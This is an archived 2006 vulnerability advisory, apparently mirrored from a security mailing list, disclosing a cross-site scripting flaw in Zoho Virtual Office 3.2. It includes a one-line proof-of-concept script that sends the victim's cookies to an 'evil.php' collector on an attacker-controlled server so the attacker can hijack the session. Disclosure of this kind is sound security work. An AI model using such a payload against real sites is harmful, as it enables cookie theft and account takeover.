Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13566
HistoryJul 24, 2006 - 12:00 a.m.

Cross Site Scripting Vulnerability in Zoho Virtual Office

2006-07-2400:00:00
vulners.com
30
JSON

Hello,

We have discovered a vunerability in Zoho Virtual Office.

Malformed HTML message could lead to XSS Attack. It can cause a cookie
theft leading to session hijacking.

PoC:
Simply creating HTML message including Javascript code could lead the
browser's frame into evil script on attacker's server.
Example:

<script>document.location='http://server/evil/evil.php?&#39;+document.cookie
</script>

evil.php file contains code which saves cookie variables on evil server.
attacker can prepare cookie and hijack the user's session.

Affected version: 3.2 Build 3210 (latest), previous versions might
also be vulnerable.
Vendor was contacted 72 hours ago.

best regards
marc & shb

JSON